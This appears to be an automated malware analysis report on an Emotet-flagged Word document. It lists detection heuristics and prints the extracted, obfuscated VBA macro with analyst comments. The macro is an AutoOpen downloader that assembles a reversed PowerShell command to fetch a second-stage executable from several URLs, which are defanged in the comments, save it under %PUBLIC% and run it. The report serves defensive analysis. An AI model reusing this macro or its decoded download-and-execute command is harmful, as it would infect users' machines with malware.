Malware Insights
The sample triggers critical heuristics for VBA macros and a Shell() call, strongly indicating malicious intent; ClamAV identifies it as 'Doc.Downloader.Emotet-6884067-0'. The obfuscated VBA assembles a cmd.exe command line from caret-escaped string fragments whose PowerShell portion is stored character-reversed; a cmd `for /L` loop (visible in the macro listing below) un-reverses it at run time and launches a PowerShell downloader that tries a list of '@'-separated URLs in turn, saves the first successful download as %PUBLIC%\635.exe and runs it with Invoke-Item — a second-stage payload fetch. The analyzer's partially reconstructed command string (still reversed, carets and spacing not fully normalized) is: 'cmd /V:O /C "set Z5IA= } {kaerb;Amd$^ " ;Amd$^ ,adq$(elifd aoln w oD.FCC ${yr t {)DR F$^ n i adq$(hcaero f;' ex e.'+VVM$+'\' + cilbup:vne$^ =Amd$^;'536' = VV M$^;)^'@'(tilpS.^'hFzgH Jm/yb.xul-arolf.www//:ptth@wkqXjOG/ku.'
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6884067-0 — severity: critical — CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Downloader.Emotet-6884067-0
-
VBA macros detected — severity: medium — 2 related findings — OLE_VBA_MACROS — Document contains VBA macro code
-
Shell() call in VBA — severity: critical — OLE_VBA_SHELL — Shell() call in VBA. The Shell() call site is not within the lines previewed below (the third module, jQJwTrFjI, is truncated); confirm its location in the full extracted macros.bas.
-
AutoOpen macro — severity: high — OLE_VBA_AUTOOPEN — AutoOpen macro (Sub AutoOpen in module ZIhIpmj, whose VB_Base is Normal.ThisDocument; it runs as soon as the document is opened with macros enabled)
-
Legacy WordBasic auto-exec macro marker — severity: medium — OLE_LEGACY_WORDBASIC_AUTOEXEC — OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (Note: this heuristic's "no modern VBA project was recovered" wording conflicts with the OLE_VBA_MACROS finding and the 4418-byte decoded VBA project, macros.bas, listed under Extracted artifacts; treat that wording as inconsistent and rely on the VBA findings.)
-
Embedded URL — severity: info — EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). Note: this is the standard DrawingML XML namespace and is benign on its own; the actual download URLs are carried only inside the macro as caret-escaped, character-reversed string fragments and were not surfaced by URL extraction.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 1f754dcb354c1f1e184634abdbd5c59b1d73d6d60126f3331374c2641c22a360) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4418 bytes |
Preview script — first 1,000 lines of the extracted script (the listing below is truncated before the end of the third module):
' Module header as emitted by olevba. VB_Base = "1Normal.ThisDocument" marks
' this as the document's ThisDocument module (derived from Normal.dotm),
' which is why the AutoOpen defined below is honoured as an auto-exec macro.
' The module name ZIhIpmj, like the other identifiers in this project,
' appears to be randomly generated.
Attribute VB_Name = "ZIhIpmj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-exec entry point (OLE_VBA_AUTOOPEN): Word runs AutoOpen as soon as the
' document is opened, with no user interaction beyond enabling macros.
Sub AutoOpen()
' The If blocks below compare undeclared names (implicit Variants that are
' never assigned in this procedure) and only store string literals into
' locals that are never read again: junk code padding the single real
' statement, the jmHtqvtib(...) call.
If ozvjrE Xor GtljZ Then
wauzF = "OCFSwJ"
End If
If pmJTl <= 12 Then
ALJWOw = "kNRVZf"
End If
If pdoLt = shwdrl Then
umfnIY = "DBpGtYXJbwiSEY"
End If
If Hstwwk >= mChjq Then
irztwI = "YkjSCRR"
End If
' The payload: concatenates the command-line fragments returned by wmwaJ,
' morOjcjH and bOfhVCUKH (module jMohWYEOYPKN below) with two KeyString()
' results and several names that do not appear in this listing (BJmAnzj,
' dcXoWj, fkwzPzSQ, qwnOItzK), then hands the string to jmHtqvtib.
' With the unassigned Variants evaluating as Empty (0), the KeyString
' arguments reduce to 17+19+31 = 67 and 20+21+36 = 77; Word's
' Application.KeyString maps a key code to a key name, so these presumably
' supply the "c" and "m" of the "cmd /V:O/C" prefix the analyzer reconstructed,
' with the unknown names contributing empty strings if they are unassigned
' Variants -- TODO confirm in a sandbox.
' jmHtqvtib is defined in module jQJwTrFjI, whose body is cut off in this
' preview; the OLE_VBA_SHELL finding suggests that is where Shell() is
' ultimately called, but the call is not visible here.
jmHtqvtib (KeyString(mVWBG + hwZbkZU + 17 + 19 + 31 + vwIkQY + wdpow) + BJmAnzj + dcXoWj + KeyString(jEdjFZlN + Ddquka + 20 + 21 + 36 + bnUwULi + oAvlO) + wmwaJ + morOjcjH + bOfhVCUKH + fkwzPzSQ + qwnOItzK)
If hRVPjG <= wZjJh Then
mIXczn = "Wp"
End If
End Sub
' Second module: holds the three string-builder functions (wmwaJ, morOjcjH,
' bOfhVCUKH) whose return values AutoOpen concatenates into the command line.
Attribute VB_Name = "jMohWYEOYPKN"
' Returns the first (in file order) chunk of the cmd.exe command line.
' Two obfuscation layers are used throughout this module:
'   * "^" is the cmd.exe escape character and is dropped while the command
'     line is parsed, so the carets sprinkled through every literal vanish at
'     run time and only defeat naive string matching.
'   * Everything after "set Z5IA=" is the PowerShell script stored
'     character-REVERSED; the for /L loop built in bOfhVCUKH reverses it back
'     before calling it.
' With carets stripped and the reversed text restored, this function
' contributes:
'   d /V:O/C"set Z5IA=<reversed script...>
'     (/V:O appears to enable delayed expansion, which the !U2y! and
'     !Z5IA:~%s,1! references in bOfhVCUKH's loop require)
'   ...hxxp://www[.]flora-lux[.]by/mJHgzFh'.Split('@');$MVV = '635';
'   $dmA=$env:public+'\'+$MVV+'.exe';
'   foreach($qda in $FRD){try{$CCF.DownloadFile($qda, $dmA);Invoke-Item $dmA;break;}catch{}}
' i.e. try each URL in turn, save the first successful download as
' %PUBLIC%\635.exe, execute it with Invoke-Item and swallow all failures.
' URL fragments in this function (defanged; the other halves are in
' morOjcjH): ...ssarsetelagoas[.]com[.]br/8tr1wP, hxxp://www[.]fix4pc[.]co[.]uk/GOjXqkw,
' hxxp://www[.]flora-lux[.]by/mJ...
' Decoded by hand from this listing -- verify in a sandbox before using as IOCs.
' The If blocks are junk padding as in AutoOpen.
Function wmwaJ()
If YXKTOi <= VsFua Then
pNYloM = "fTbIlX"
End If
If lIODrc <= iGzwwr Then
amffN = "BGpnuFFjcjduo"
End If
' "d /V:O/C" + opening quote + "set Z5IA=" + padding + reversed tail of the
' script (" $dmA;break;}catch{}}" once reversed).
RLluMEkdW = "d /V^:^O/C" + """" + "^s^e^t Z^5^I^A=^ " + "^ ^ ^ ^ ^ ^ ^ ^" + " ^ ^ ^ ^ ^ ^ ^}^" + "}^{hc^tac^}^;^k^a^e" + "r^b^;^A^m^d^$^ ^"
If TDIhR And PULzQ Then
lzhziH = "PLsGbiGEvBhra"
End If
' Reversed: "wnloadFile($qda, $dmA);Invoke-Item"
RhwDw = "m^e^t^I^-^" + "e^k^ovn^I^;" + ")^A^m^d^$^ ^,^a^d^" + "q$(^e^li^F^d^ao^ln^"
If fzLiB > 12 Then
baQNnw = "Eq"
End If
If zhCLzU > 13 Then
dIqwm = "jNlbGQI"
End If
If Bmtjn = 7 Then
DZpwhu = "uJGQKm"
End If
' Reversed: "V+'.exe';foreach($qda in $FRD){try{$CCF.Dow"
QjOEVlZOJ = "w^o^D^.^FCC^$^{^yr^" + "t^{)DR^F^$^ n^i^ ^a^" + "d^q^$(hc^a^er^" + "o^f^;^'^e^xe^.^'^+V"
' Reversed: "HgzFh'.Split('@');$MVV = '635';$dmA=$env:public+'\'+$MV"
NCBWTpJz = "V^M^$^+^'^\^'" + "+c^il^b^u^p^:vn^e^$^" + "=^A^m^d^$^;'" + "^5^36^'^ ^=^ VV^" + "M^$^;)^'^@^'(^t^i^l^" + "pS^.^'^h^F^z^g^H"
If kwjFiI <= NvVpDV Then
JfCFz = "Sa"
End If
' Reversed: "c.co.uk/GOjXqkw@http://www.flora-lux.by/mJ"
wtwiFzXM = "^J^m/^y^b^.^x^u^" + "l^-^ar^o^l^" + "f^.w^w^w//^:p^t^t^h^" + "@^w^k^q^X^jO^G/k" + "^u^.^oc^.c^"
' Reversed: "ssarsetelagoas.com.br/8tr1wP@http://www.fix4p"
UlzhYbfWU = "p^4^xi^f^.^w^w^w" + "//:^p^tt^h^@^Pw1r" + "^t^8/r^b^.^m" + "^oc^.^s^a^o^g^al^et" + "e^sr^a^s^s"
wmwaJ = RLluMEkdW + RhwDw + QjOEVlZOJ + NCBWTpJz + wtwiFzXM + UlzhYbfWU
If sOoDH <> kobPc Then
sQuPBK = "CZIGAdYuY"
End If
If knYBlV >= LJtzjw Then
Vlmaj = "jinvdrwdfiw"
End If
If izDTFv >= ifRwzI Then
LKkaC = "dT"
End If
If kzbbJ <= 16 Then
GQmYVk = "ODlnwFl"
End If
End Function
' Returns the middle chunk of the command line: more of the reversed
' PowerShell text, carrying the end of the "$CCF=new-object Net.WebClient;
' $FRD='..." assignment and the first download URLs. Because the script is
' stored reversed, the LAST fragment here is the FIRST to execute. Carets
' stripped and reversed, in run-time order:
'   bClient;$FRD='http://www.muabang     (AMEHQYXnFZ)
'   iup.com/I6gpE@http://www.tekere      (kCljiPYmQi)
'   .es/ce45TO3@http://www.expre         (GPLWG)
' giving (defanged) hxxp://www[.]muabangiup[.]com/I6gpE,
' hxxp://www[.]tekere[.]es/ce45TO3 and the start of
' hxxp://www[.]expressarsetelagoas[.]com[.]br/8tr1wP (completed in wmwaJ).
' Decoded by hand from this listing -- verify before using as IOCs.
' The If blocks are junk padding as in AutoOpen.
Function morOjcjH()
If oTVkC Or 14 Then
jLfWn = "HwBlJNijcLQDj"
End If
If jHnaiP <= pukih Then
KzhTf = "EZAs"
End If
' Reversed: ".es/ce45TO3@http://www.expre"
GPLWG = "^er^p^x^e^.w^w^w" + "//^:p^t^t^h@3O^T^" + "54^ec/^s^e^."
If sWdXR Or YvACFu Then
VEiHR = "sswFqUzv"
End If
If nOiPw And uwrFs Then
wVtnL = "LiMTQnNIpdD"
End If
' Reversed: "iup.com/I6gpE@http://www.tekere"
kCljiPYmQi = "^er^e^k^e^t^.^w" + "^w^w//^:^p^t^t^h@" + "^E^p^g^6^I/^" + "m^oc^.^p^u^i"
If zmYjv > dsPiFS Then
pElivI = "Pnc"
End If
If ZLuRmC Or sXFjk Then
VCVCM = "o"
End If
If DKwHNa Xor zTMIs Then
GiOfp = "f"
End If
If NRQiM Eqv UqMKco Then
ahlCIh = "fdwt"
End If
If RtZBz > Vwczm Then
LjHYMS = "ai"
End If
' Reversed: "bClient;$FRD='http://www.muabang"
AMEHQYXnFZ = "^gn^a^ba^u^m.^w^w" + "^w//^:^p^t^" + "t^h^'^=^DR^F^$^" + ";^tn^e^i^lC^b"
morOjcjH = GPLWG + kCljiPYmQi + AMEHQYXnFZ
If POIht > 16 Then
szZpjU = "zXFbFOj"
End If
If tkzbQ Eqv 18 Then
izfqj = "rddz"
End If
End Function
' Returns the final chunk: the head of the reversed PowerShell script plus
' the cmd.exe loop that un-reverses and runs it. Carets stripped, it reads:
'   eW.teN tcejbo-wen=FCC$ llehsrewop   (reversed: "powershell $CCF=new-object Net.We")
'   &&for /L %s in (379,-1,0)do set U2y=!U2y!!Z5IA:~%s,1!&&if %s==0 call %U2y:~-380%"
' The loop walks Z5IA from index 379 down to 0 (380 characters), appending
' one character per iteration to U2y -- i.e. it reverses the string -- and on
' the final iteration calls the last 380 characters of U2y, which is the
' decoded "powershell ..." command. Delayed expansion (!var!) must be active
' for the substring references to work, hence the /V:O switch in wmwaJ.
' The trailing double quote (EHTkqQON) closes the quote opened after /C in
' wmwaJ. The If blocks are junk padding as in AutoOpen.
Function bOfhVCUKH()
' Reversed script head + "&&for /L %s in (379,-1"
IjQDz = "^e^W^.^t^eN^ ^t" + "c^e^j^b^o^-^w^en^=" + "^FCC^$ ^l^l^e" + "^h^sr^ew^o^p&&^f^" + "or /^L %^s " + "^in (^3^7^9^,^-^1"
If UwHhnG > skwoO Then
EzsMR = "ra"
End If
If sNKTjq Xor 14 Then
CYkODb = "i"
End If
If Episk >= oXmhrp Then
MuFGoa = "uznIjOKPmOnYku"
End If
If dBuTu < 9 Then
rCdwiP = "RMqKj"
End If
' ",0)do set U2y=!U2y!!Z5IA:~%s,1!&&if %s==0 call %U2y:~-38"
wPFDGOqvr = "^,^0)^d^o ^s^e" + "^t ^U^2^y=" + "!^U^2^y!!Z^5" + "^I^A:~%^s,1!&&^i^f" + " %^s=^=^0 c^a^l^l %^" + "U^2^y:^~^-^3^8"
' "0%" followed by the closing double quote (the final "" adds nothing).
EHTkqQON = "^0%" + """" + ""
bOfhVCUKH = IjQDz + wPFDGOqvr + EHTkqQON
If mvpnA <> CXoco Then
KZWQQ = "wr"
End If
If PYkYt And EpJBv Then
DICVwF = "QzizZEl"
End If
If KwkwWk = LTHuED Then
MHsnG = "hTR"
End If
If NlSwZ Xor hXPPf Then
MJCAk = "GCV"
End If
End Function
' Third module: holds jmHtqvtib(RAfflt As String), which receives the
' assembled command line from AutoOpen. Its body is truncated in this preview,
' so the Shell() call reported by OLE_VBA_SHELL cannot be confirmed here.
Attribute VB_Name = "jQJwTrFjI"
Function jmHtqvtib(RAfflt As String)
Const cshrXuVAjC = 264242985 - 264242985
If lRCWj >= sKniW Then
ScAcu = "Tb
... (truncated)